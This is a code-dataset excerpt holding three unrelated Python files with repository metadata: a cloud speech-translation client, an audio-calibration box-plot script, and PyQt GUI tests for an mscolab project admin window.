] | null | null | null | src/client.py | Shandilya21/oratio | 53a77404df35a6b2b73c6a74a0e40d3f8747c408 | [
"BSD-3-Clause"
] | null | null | null | import enum
import json
from target_voice import create_voice, gender_string
import api.stt.util
class Provider(enum.Enum):
GCLOUD = 1
AWS = 2
AWS_DEEPL = 3
class Client:
def __init__(
self,
upload_filename,
stt_provider=Provider.GCLOUD,
translate_provider=Provider.GCLOUD,
tts_provider=Provider.GCLOUD,
gcloud_speedup=False, # temporary flag
gender=None,
):
self.upload_filename = upload_filename
self.stt_provider = stt_provider
self.translate_provider = translate_provider
self.tts_provider = tts_provider
self.setup_clients()
self.gcloud_speedup = gcloud_speedup
self.gender = gender
def setup_clients(self):
if self.stt_provider == Provider.GCLOUD:
from api.storage import gcloud_storage as storage
from api.stt import gcloud_stt as stt
if self.translate_provider == Provider.GCLOUD:
from api.translate import gcloud_translate as translate
if self.tts_provider == Provider.GCLOUD:
from api.tts import gcloud_tts as tts
if self.stt_provider == Provider.AWS:
from api.storage import aws_storage as storage
from api.stt import aws_stt as stt
if self.translate_provider == Provider.AWS:
from api.translate import aws_translate as translate
if self.tts_provider == Provider.AWS:
from api.tts import aws_tts as tts
if self.stt_provider == Provider.AWS_DEEPL:
from api.storage import aws_storage as storage
from api.stt import aws_stt as stt
if self.translate_provider == Provider.AWS_DEEPL:
from api.translate import deepl_translate as translate
if self.tts_provider == Provider.AWS_DEEPL:
from api.tts import aws_tts as tts
self.storage = storage
self.stt = stt
self.translate = translate
self.tts = tts
self.storage_client = storage.get_client()
self.stt_client = stt.get_client()
if not self.translate_provider == Provider.AWS_DEEPL:
self.translate_client = translate.get_client()
self.tts_client = tts.get_client()
self.target_voices = {}
# input_file should be a complete path
def upload_file_to_cloud(self, input_file):
self.storage.upload_file_to_cloud(
self.storage_client, input_file, self.upload_filename
)
def transcribe_sentences(self, locale):
response = self.stt.transcribe_storage_uri(
self.stt_client, self.upload_filename, locale
)
word_list = self.stt.get_word_list(response)
return api.stt.util.create_sentences_from_word_list(word_list, locale)
def get_translation(self, original_text, target_language):
if not self.translate_provider == Provider.AWS_DEEPL:
return self.translate.get_translation(
self.translate_client, original_text, target_language
)
else:
return self.translate.get_translation(original_text, target_language)
def get_target_voice(self, locale, gender):
response = self.tts.list_voices(self.tts_client, locale)
voices = self.tts.normalize_voices(response)
# find the best matches
options = [
v for v in voices if (v.gender == self.gender and v.locale == locale)
]
if voices == []:
# TODO add error handling
return None
if options == []:
print("Couldn't find a matching voice.")
return voices[0]
# if there is only one option, there is no option
if len(options) == 1:
return options[0]
print(f"Options for {gender_string(gender)} - {locale}")
for idx, voice in enumerate(options):
print(f"#{idx} - {voice.name}")
choice = input(
f"Choose a voice by entering a number between 0:{len(options)-1} [Default: 0]: "
)
if choice.strip() == "":
choice = 0
return options[int(choice)]
def get_audio_chunk_for_sentence(self, text, locale, speedup=1.0):
if locale not in self.target_voices:
self.target_voices[locale] = self.get_target_voice(locale, self.gender)
print(self.target_voices[locale])
update_best_voices = input(
"Would you like to update the best voices file? (y/N) "
)
if update_best_voices == "y":
self.save_best_voices()
if self.tts_provider == Provider.GCLOUD:
return self.tts.get_audio_chunk_for_sentence(
self.tts_client, text, self.target_voices[locale], speedup=speedup
)
else:
return self.tts.get_audio_chunk_for_sentence(
self.tts_client, text, self.target_voices[locale]
)
# Returns a list of voices which match the gender of the client
def get_all_matching_voices(self):
response = self.tts.list_voices(self.tts_client)
voices = self.tts.normalize_voices(response)
translation_lang_codes = self.translate.get_supported_languages(
self.translate_client
)
# don't synthesize if the translation doesn't exist
broken = []
for v in voices:
if v.lang_code not in translation_lang_codes:
broken.append(v.locale)
return [
v for v in voices if (v.gender == self.gender and v.locale not in broken)
]
def load_best_voices(self, voices_file, target_locales):
# json will have the following structure
# { gender: {
# "AWS" : {
# locale : voiceId
# ...
# },
# "gcloud" : {
# locale : name
# ...
# },
# }
# }
self.voices_file = voices_file
with open(voices_file) as f:
voices = json.load(f)
provider = self.tts.provider_name()
gender = gender_string(self.gender)
if gender not in voices or provider not in voices[gender]:
return
for locale, name in voices[gender][
provider
].items(): # this should be a list of locale : name
if provider == "AWS":
self.target_voices[locale] = create_voice(
locale, self.gender, voiceId=name
)
if provider == "gcloud":
self.target_voices[locale] = create_voice(
locale, self.gender, gcloud_name=name
)
if locale in target_locales:
print(self.target_voices[locale])
def save_best_voices(self):
with open(self.voices_file) as f:
voices = json.load(f)
provider = self.tts.provider_name()
gender = gender_string(self.gender)
if gender not in voices:
voices[gender] = {}
if provider not in voices[gender]:
voices[gender][provider] = {}
for locale, voice in self.target_voices.items():
voices[gender][provider][locale] = voice.name
with open(self.voices_file, "w") as w:
w.write(json.dumps(voices, indent=2))
| 34.202765 | 92 | 0.597683 | import enum
import json
from target_voice import create_voice, gender_string
import api.stt.util
class Provider(enum.Enum):
GCLOUD = 1
AWS = 2
AWS_DEEPL = 3
class Client:
def __init__(
self,
upload_filename,
stt_provider=Provider.GCLOUD,
translate_provider=Provider.GCLOUD,
tts_provider=Provider.GCLOUD,
gcloud_speedup=False,
gender=None,
):
self.upload_filename = upload_filename
self.stt_provider = stt_provider
self.translate_provider = translate_provider
self.tts_provider = tts_provider
self.setup_clients()
self.gcloud_speedup = gcloud_speedup
self.gender = gender
def setup_clients(self):
if self.stt_provider == Provider.GCLOUD:
from api.storage import gcloud_storage as storage
from api.stt import gcloud_stt as stt
if self.translate_provider == Provider.GCLOUD:
from api.translate import gcloud_translate as translate
if self.tts_provider == Provider.GCLOUD:
from api.tts import gcloud_tts as tts
if self.stt_provider == Provider.AWS:
from api.storage import aws_storage as storage
from api.stt import aws_stt as stt
if self.translate_provider == Provider.AWS:
from api.translate import aws_translate as translate
if self.tts_provider == Provider.AWS:
from api.tts import aws_tts as tts
if self.stt_provider == Provider.AWS_DEEPL:
from api.storage import aws_storage as storage
from api.stt import aws_stt as stt
if self.translate_provider == Provider.AWS_DEEPL:
from api.translate import deepl_translate as translate
if self.tts_provider == Provider.AWS_DEEPL:
from api.tts import aws_tts as tts
self.storage = storage
self.stt = stt
self.translate = translate
self.tts = tts
self.storage_client = storage.get_client()
self.stt_client = stt.get_client()
if not self.translate_provider == Provider.AWS_DEEPL:
self.translate_client = translate.get_client()
self.tts_client = tts.get_client()
self.target_voices = {}
def upload_file_to_cloud(self, input_file):
self.storage.upload_file_to_cloud(
self.storage_client, input_file, self.upload_filename
)
def transcribe_sentences(self, locale):
response = self.stt.transcribe_storage_uri(
self.stt_client, self.upload_filename, locale
)
word_list = self.stt.get_word_list(response)
return api.stt.util.create_sentences_from_word_list(word_list, locale)
def get_translation(self, original_text, target_language):
if not self.translate_provider == Provider.AWS_DEEPL:
return self.translate.get_translation(
self.translate_client, original_text, target_language
)
else:
return self.translate.get_translation(original_text, target_language)
def get_target_voice(self, locale, gender):
response = self.tts.list_voices(self.tts_client, locale)
voices = self.tts.normalize_voices(response)
options = [
v for v in voices if (v.gender == self.gender and v.locale == locale)
]
if voices == []:
return None
if options == []:
print("Couldn't find a matching voice.")
return voices[0]
# if there is only one option, there is no option
if len(options) == 1:
return options[0]
print(f"Options for {gender_string(gender)} - {locale}")
for idx, voice in enumerate(options):
print(f"#{idx} - {voice.name}")
choice = input(
f"Choose a voice by entering a number between 0:{len(options)-1} [Default: 0]: "
)
if choice.strip() == "":
choice = 0
return options[int(choice)]
def get_audio_chunk_for_sentence(self, text, locale, speedup=1.0):
if locale not in self.target_voices:
self.target_voices[locale] = self.get_target_voice(locale, self.gender)
print(self.target_voices[locale])
update_best_voices = input(
"Would you like to update the best voices file? (y/N) "
)
if update_best_voices == "y":
self.save_best_voices()
if self.tts_provider == Provider.GCLOUD:
return self.tts.get_audio_chunk_for_sentence(
self.tts_client, text, self.target_voices[locale], speedup=speedup
)
else:
return self.tts.get_audio_chunk_for_sentence(
self.tts_client, text, self.target_voices[locale]
)
# Returns a list of voices which match the gender of the client
def get_all_matching_voices(self):
response = self.tts.list_voices(self.tts_client)
voices = self.tts.normalize_voices(response)
translation_lang_codes = self.translate.get_supported_languages(
self.translate_client
)
# don't synthesize if the translation doesn't exist
broken = []
for v in voices:
if v.lang_code not in translation_lang_codes:
broken.append(v.locale)
return [
v for v in voices if (v.gender == self.gender and v.locale not in broken)
]
def load_best_voices(self, voices_file, target_locales):
# json will have the following structure
# { gender: {
# "AWS" : {
# locale : voiceId
# ...
# },
# "gcloud" : {
# locale : name
# ...
# },
# }
# }
self.voices_file = voices_file
with open(voices_file) as f:
voices = json.load(f)
provider = self.tts.provider_name()
gender = gender_string(self.gender)
if gender not in voices or provider not in voices[gender]:
return
for locale, name in voices[gender][
provider
].items(): # this should be a list of locale : name
if provider == "AWS":
self.target_voices[locale] = create_voice(
locale, self.gender, voiceId=name
)
if provider == "gcloud":
self.target_voices[locale] = create_voice(
locale, self.gender, gcloud_name=name
)
if locale in target_locales:
print(self.target_voices[locale])
def save_best_voices(self):
with open(self.voices_file) as f:
voices = json.load(f)
provider = self.tts.provider_name()
gender = gender_string(self.gender)
if gender not in voices:
voices[gender] = {}
if provider not in voices[gender]:
voices[gender][provider] = {}
for locale, voice in self.target_voices.items():
voices[gender][provider][locale] = voice.name
with open(self.voices_file, "w") as w:
w.write(json.dumps(voices, indent=2))
| true | true |
f7236d5b15b17c1222fa056d925e9c65b7d75e62 | 2,881 | py | Python | analyser/analysis/pen_calculation_deviation_box_plots.py | michigg/web-simultaneous-recording-tool | 67db83f6e34d9cb726c69b4e448fed3604a43618 | [
"MIT"
] | 1 | 2022-03-30T09:45:25.000Z | 2022-03-30T09:45:25.000Z | analyser/analysis/pen_calculation_deviation_box_plots.py | michigg/web-simultaneous-recording-tool | 67db83f6e34d9cb726c69b4e448fed3604a43618 | [
"MIT"
] | null | null | null | analyser/analysis/pen_calculation_deviation_box_plots.py | michigg/web-simultaneous-recording-tool | 67db83f6e34d9cb726c69b4e448fed3604a43618 | [
"MIT"
] | null | null | null | """
"""
import sys
import numpy as np
import pandas as pd
from scipy.signal import argrelextrema
from analysis.frog_click_mean_calculation import calc_click_mean_quantil_based
from utils import dataframe_index, audio_calcs
from utils.data_exporter import Exporter
from utils.data_loader import Loader
import logging
from utils.output import Output
# INPUT_DEVICES = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Converted/devices-1-aggregated-dbas-distance_0m-device.pkl'
INPUT_DEVICES = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Converted/devices-1-aggregated-dbas.pkl'
OUTPUT_DIR = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Graphs/Calculations/BoxPlots'
logger = logging.getLogger(__name__)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(levelname)s]:\n %(message)s",
handlers=[
logging.FileHandler(f"{OUTPUT_DIR}/analyse.log", mode='w'),
logging.StreamHandler(sys.stdout)
]
)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
def main():
devices = Loader.load_analysis_from_pickle(INPUT_DEVICES)
sample_rate = dataframe_index.get_sample_rate(devices)
buffer_size = dataframe_index.get_buffer_size(devices)
dataframes = []
# global max
result = audio_calcs.calculate_global_max(devices)
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = ['global max']
dataframes.append(result)
# quantil based deviations
result = devices.apply(
calc_click_mean_quantil_based,
axis=1,
sample_rate=sample_rate,
buffer_size=buffer_size,
db_only=True
).to_frame()
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = ['quantile based']
dataframes.append(result)
# global max based using db_range
for db_range in [10, 15, 20]:
result = devices.apply(
audio_calcs.calc_series_click_mean,
axis=1,
sample_rate=sample_rate,
buffer_size=buffer_size,
db_range=db_range,
return_maxima=False
).to_frame()
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = [f'{db_range} dB(A) range global max']
dataframes.append(result)
results = pd.concat(dataframes, axis=1)
logger.info(results)
Output.box_plot(
'',
# f'Deviations In dB(A) Between Frogs By Calculation Method',
results,
file_path=f'{OUTPUT_DIR}',
file_name=f'box-plot-calculation-methods',
ignore_clean=True,
hide_outliers=True
)
if __name__ == '__main__':
main()
| 30.326316 | 149 | 0.695245 | import sys
import numpy as np
import pandas as pd
from scipy.signal import argrelextrema
from analysis.frog_click_mean_calculation import calc_click_mean_quantil_based
from utils import dataframe_index, audio_calcs
from utils.data_exporter import Exporter
from utils.data_loader import Loader
import logging
from utils.output import Output
INPUT_DEVICES = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Converted/devices-1-aggregated-dbas.pkl'
OUTPUT_DIR = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Graphs/Calculations/BoxPlots'
logger = logging.getLogger(__name__)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(levelname)s]:\n %(message)s",
handlers=[
logging.FileHandler(f"{OUTPUT_DIR}/analyse.log", mode='w'),
logging.StreamHandler(sys.stdout)
]
)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
def main():
devices = Loader.load_analysis_from_pickle(INPUT_DEVICES)
sample_rate = dataframe_index.get_sample_rate(devices)
buffer_size = dataframe_index.get_buffer_size(devices)
dataframes = []
result = audio_calcs.calculate_global_max(devices)
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = ['global max']
dataframes.append(result)
result = devices.apply(
calc_click_mean_quantil_based,
axis=1,
sample_rate=sample_rate,
buffer_size=buffer_size,
db_only=True
).to_frame()
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = ['quantile based']
dataframes.append(result)
for db_range in [10, 15, 20]:
result = devices.apply(
audio_calcs.calc_series_click_mean,
axis=1,
sample_rate=sample_rate,
buffer_size=buffer_size,
db_range=db_range,
return_maxima=False
).to_frame()
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = [f'{db_range} dB(A) range global max']
dataframes.append(result)
results = pd.concat(dataframes, axis=1)
logger.info(results)
Output.box_plot(
'',
results,
file_path=f'{OUTPUT_DIR}',
file_name=f'box-plot-calculation-methods',
ignore_clean=True,
hide_outliers=True
)
if __name__ == '__main__':
main()
| true | true |
f7236dd43c0f9b521cc15880e1ba140ac3804e61 | 10,414 | py | Python | mslib/msui/_tests/test_mscolab_admin_window.py | iamansoni/MSS | 69bc8fc61ab277697ca691119f911382a63860c0 | [
"Apache-2.0"
] | null | null | null | mslib/msui/_tests/test_mscolab_admin_window.py | iamansoni/MSS | 69bc8fc61ab277697ca691119f911382a63860c0 | [
"Apache-2.0"
] | null | null | null | mslib/msui/_tests/test_mscolab_admin_window.py | iamansoni/MSS | 69bc8fc61ab277697ca691119f911382a63860c0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
mslib.msui._tests.test_mscolab_project
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module is used to test mscolab-project related gui.
This file is part of mss.
:copyright: Copyright 2019 Shivashis Padhi
:copyright: Copyright 2019-2020 by the mss team, see AUTHORS.
:license: APACHE-2.0, see LICENSE for details.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import time
from mslib.msui.mscolab import MSSMscolabWindow
from mslib._tests.constants import MSCOLAB_URL_TEST
from mslib.mscolab.conf import mscolab_settings
from mslib.mscolab.server import APP, db, initialize_managers
from PyQt5 import QtCore, QtTest, QtWidgets
class Test_MscolabAdminWindow(object):
def setup(self):
"""
User being used during test: id = 5, username = test1
"""
self.app = APP
self.app.config['SQLALCHEMY_DATABASE_URI'] = mscolab_settings.SQLALCHEMY_DB_URI
self.app.config['MSCOLAB_DATA_DIR'] = mscolab_settings.MSCOLAB_DATA_DIR
self.app, _, cm, fm = initialize_managers(self.app)
self.fm = fm
self.cm = cm
db.init_app(self.app)
self.application = QtWidgets.QApplication(sys.argv)
self.window = MSSMscolabWindow(data_dir=mscolab_settings.MSCOLAB_DATA_DIR,
mscolab_server_url=MSCOLAB_URL_TEST)
self._login()
self._activate_project_at_index(0)
QtTest.QTest.mouseClick(self.window.adminWindowBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
self.admin_window = self.window.admin_window
QtTest.QTest.qWaitForWindowExposed(self.window)
QtWidgets.QApplication.processEvents()
def teardown(self):
# to disconnect connections, and clear token
# Not logging out since it pops up a dialog
# self.window.logout()
if self.window.admin_window:
self.window.admin_window.close()
if self.window.conn:
self.window.conn.disconnect()
self.window.close()
QtWidgets.QApplication.processEvents()
self.application.quit()
QtWidgets.QApplication.processEvents()
def test_permission_filter(self):
len_added_users = self.admin_window.modifyUsersTable.rowCount()
# Change filter to viewer
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
QtWidgets.QApplication.processEvents()
# Check how many users are visible
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 1
# Change it back to all
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("all")
QtWidgets.QApplication.processEvents()
# Check how many rows are visible
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == len_added_users
def test_text_search_filter(self):
len_unadded_users = self.admin_window.addUsersTable.rowCount()
len_added_users = self.admin_window.modifyUsersTable.rowCount()
# Text Search in add users Table
QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "test2")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
assert visible_row_count == 1
self.admin_window.addUsersSearch.setText("")
QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
assert visible_row_count == len_unadded_users
# Text Search in modify users Table
QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 1
self.admin_window.modifyUsersSearch.setText("")
QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == len_added_users
def test_permission_and_text_together(self):
QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 1
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("admin")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 0
def test_add_permissions(self):
len_unadded_users = self.admin_window.addUsersTable.rowCount()
len_added_users = self.admin_window.modifyUsersTable.rowCount()
users = ["test2", "test3"]
# Select users in the add users table
self._select_users(self.admin_window.addUsersTable, users)
QtTest.QTest.mouseClick(self.admin_window.addUsersBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
# Check if they have been added in the modify users table
self._check_users_present(self.admin_window.modifyUsersTable, users, "admin")
assert len_unadded_users - 2 == self.admin_window.addUsersTable.rowCount()
assert len_added_users + 2 == self.admin_window.modifyUsersTable.rowCount()
def test_modify_permissions(self):
users = ["test2", "test3"]
# Select users in the modify users table
self._select_users(self.admin_window.modifyUsersTable, users)
# Update their permission to viewer
index = self.admin_window.modifyUsersPermission.findText("viewer", QtCore.Qt.MatchFixedString)
self.admin_window.modifyUsersPermission.setCurrentIndex(index)
QtTest.QTest.mouseClick(self.admin_window.modifyUsersBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
# Check if the permission has been updated
self._check_users_present(self.admin_window.modifyUsersTable, users, "viewer")
def test_delete_permissions(self):
len_unadded_users = self.admin_window.addUsersTable.rowCount()
len_added_users = self.admin_window.modifyUsersTable.rowCount()
users = ["test2", "test3"]
# Select users in the modify users table
self._select_users(self.admin_window.modifyUsersTable, users)
# Click on delete permissions
QtTest.QTest.mouseClick(self.admin_window.deleteUsersBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
# Check if the deleted users can be found in the add users table
self._check_users_present(self.admin_window.addUsersTable, users)
assert len_unadded_users + 2 == self.admin_window.addUsersTable.rowCount()
assert len_added_users - 2 == self.admin_window.modifyUsersTable.rowCount()
def test_import_permissions(self):
index = self.admin_window.importPermissionsCB.findText("three", QtCore.Qt.MatchFixedString)
self.admin_window.importPermissionsCB.setCurrentIndex(index)
QtTest.QTest.mouseClick(self.admin_window.importPermissionsBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
time.sleep(1)
assert self.admin_window.modifyUsersTable.rowCount() == 5
def _connect_to_mscolab(self):
self.window.url.setEditText("http://localhost:8084")
QtTest.QTest.mouseClick(self.window.connectMscolab, QtCore.Qt.LeftButton)
time.sleep(0.5)
def _login(self):
# login
self._connect_to_mscolab()
self.window.emailid.setText('test1')
self.window.password.setText('test1')
QtTest.QTest.mouseClick(self.window.loginButton, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
def _activate_project_at_index(self, index):
item = self.window.listProjects.item(index)
point = self.window.listProjects.visualItemRect(item).center()
QtTest.QTest.mouseClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
QtWidgets.QApplication.processEvents()
QtTest.QTest.mouseDClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
QtWidgets.QApplication.processEvents()
def _select_users(self, table, users):
for row_num in range(table.rowCount()):
item = table.item(row_num, 0)
username = item.text()
if username in users:
point = table.visualItemRect(item).center()
QtTest.QTest.mouseClick(table.viewport(), QtCore.Qt.LeftButton, pos=point)
QtWidgets.QApplication.processEvents()
assert len(table.selectionModel().selectedRows()) == 2
def _get_visible_row_count(self, table):
visible_row_count = 0
for row_num in range(table.rowCount()):
if table.isRowHidden(row_num) is False:
visible_row_count += 1
return visible_row_count
def _check_users_present(self, table, users, access_level=None):
found = 0
for row_num in range(table.rowCount()):
item = table.item(row_num, 0)
username = item.text()
if username in users:
found += 1
if access_level is not None:
assert table.item(row_num, 2).text() == access_level
assert found == 2
| 47.552511 | 102 | 0.70482 |
import sys
import time
from mslib.msui.mscolab import MSSMscolabWindow
from mslib._tests.constants import MSCOLAB_URL_TEST
from mslib.mscolab.conf import mscolab_settings
from mslib.mscolab.server import APP, db, initialize_managers
from PyQt5 import QtCore, QtTest, QtWidgets
class Test_MscolabAdminWindow(object):
def setup(self):
self.app = APP
self.app.config['SQLALCHEMY_DATABASE_URI'] = mscolab_settings.SQLALCHEMY_DB_URI
self.app.config['MSCOLAB_DATA_DIR'] = mscolab_settings.MSCOLAB_DATA_DIR
self.app, _, cm, fm = initialize_managers(self.app)
self.fm = fm
self.cm = cm
db.init_app(self.app)
self.application = QtWidgets.QApplication(sys.argv)
self.window = MSSMscolabWindow(data_dir=mscolab_settings.MSCOLAB_DATA_DIR,
mscolab_server_url=MSCOLAB_URL_TEST)
self._login()
self._activate_project_at_index(0)
QtTest.QTest.mouseClick(self.window.adminWindowBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
self.admin_window = self.window.admin_window
QtTest.QTest.qWaitForWindowExposed(self.window)
QtWidgets.QApplication.processEvents()
def teardown(self):
if self.window.admin_window:
self.window.admin_window.close()
if self.window.conn:
self.window.conn.disconnect()
self.window.close()
QtWidgets.QApplication.processEvents()
self.application.quit()
QtWidgets.QApplication.processEvents()
def test_permission_filter(self):
len_added_users = self.admin_window.modifyUsersTable.rowCount()
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 1
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("all")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == len_added_users
def test_text_search_filter(self):
len_unadded_users = self.admin_window.addUsersTable.rowCount()
len_added_users = self.admin_window.modifyUsersTable.rowCount()
QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "test2")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
assert visible_row_count == 1
self.admin_window.addUsersSearch.setText("")
QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
assert visible_row_count == len_unadded_users
QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 1
self.admin_window.modifyUsersSearch.setText("")
QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == len_added_users
def test_permission_and_text_together(self):
QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 1
self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("admin")
QtWidgets.QApplication.processEvents()
visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
assert visible_row_count == 0
def test_add_permissions(self):
len_unadded_users = self.admin_window.addUsersTable.rowCount()
len_added_users = self.admin_window.modifyUsersTable.rowCount()
users = ["test2", "test3"]
self._select_users(self.admin_window.addUsersTable, users)
QtTest.QTest.mouseClick(self.admin_window.addUsersBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
self._check_users_present(self.admin_window.modifyUsersTable, users, "admin")
assert len_unadded_users - 2 == self.admin_window.addUsersTable.rowCount()
assert len_added_users + 2 == self.admin_window.modifyUsersTable.rowCount()
def test_modify_permissions(self):
users = ["test2", "test3"]
self._select_users(self.admin_window.modifyUsersTable, users)
index = self.admin_window.modifyUsersPermission.findText("viewer", QtCore.Qt.MatchFixedString)
self.admin_window.modifyUsersPermission.setCurrentIndex(index)
QtTest.QTest.mouseClick(self.admin_window.modifyUsersBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
self._check_users_present(self.admin_window.modifyUsersTable, users, "viewer")
def test_delete_permissions(self):
len_unadded_users = self.admin_window.addUsersTable.rowCount()
len_added_users = self.admin_window.modifyUsersTable.rowCount()
users = ["test2", "test3"]
self._select_users(self.admin_window.modifyUsersTable, users)
QtTest.QTest.mouseClick(self.admin_window.deleteUsersBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
self._check_users_present(self.admin_window.addUsersTable, users)
assert len_unadded_users + 2 == self.admin_window.addUsersTable.rowCount()
assert len_added_users - 2 == self.admin_window.modifyUsersTable.rowCount()
def test_import_permissions(self):
index = self.admin_window.importPermissionsCB.findText("three", QtCore.Qt.MatchFixedString)
self.admin_window.importPermissionsCB.setCurrentIndex(index)
QtTest.QTest.mouseClick(self.admin_window.importPermissionsBtn, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
time.sleep(1)
assert self.admin_window.modifyUsersTable.rowCount() == 5
def _connect_to_mscolab(self):
self.window.url.setEditText("http://localhost:8084")
QtTest.QTest.mouseClick(self.window.connectMscolab, QtCore.Qt.LeftButton)
time.sleep(0.5)
def _login(self):
self._connect_to_mscolab()
self.window.emailid.setText('test1')
self.window.password.setText('test1')
QtTest.QTest.mouseClick(self.window.loginButton, QtCore.Qt.LeftButton)
QtWidgets.QApplication.processEvents()
def _activate_project_at_index(self, index):
item = self.window.listProjects.item(index)
point = self.window.listProjects.visualItemRect(item).center()
QtTest.QTest.mouseClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
QtWidgets.QApplication.processEvents()
QtTest.QTest.mouseDClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
QtWidgets.QApplication.processEvents()
def _select_users(self, table, users):
for row_num in range(table.rowCount()):
item = table.item(row_num, 0)
username = item.text()
if username in users:
point = table.visualItemRect(item).center()
QtTest.QTest.mouseClick(table.viewport(), QtCore.Qt.LeftButton, pos=point)
QtWidgets.QApplication.processEvents()
assert len(table.selectionModel().selectedRows()) == 2
def _get_visible_row_count(self, table):
visible_row_count = 0
for row_num in range(table.rowCount()):
if table.isRowHidden(row_num) is False:
visible_row_count += 1
return visible_row_count
def _check_users_present(self, table, users, access_level=None):
found = 0
for row_num in range(table.rowCount()):
item = table.item(row_num, 0)
username = item.text()
if username in users:
found += 1
if access_level is not None:
assert table.item(row_num, 2).text() == access_level
assert found == 2
| true | true |
f7236f7de1a0f4da758da8b43c6cbb53ac940cb4 | 14,831 | py | Python | spacy/cli/pretrain.py | Ali-Tahir/spaCy | 9e210fa7fdb8e376655e7a7ab7debd3ffd718a63 | [
"MIT"
] | null | null | null | spacy/cli/pretrain.py | Ali-Tahir/spaCy | 9e210fa7fdb8e376655e7a7ab7debd3ffd718a63 | [
"MIT"
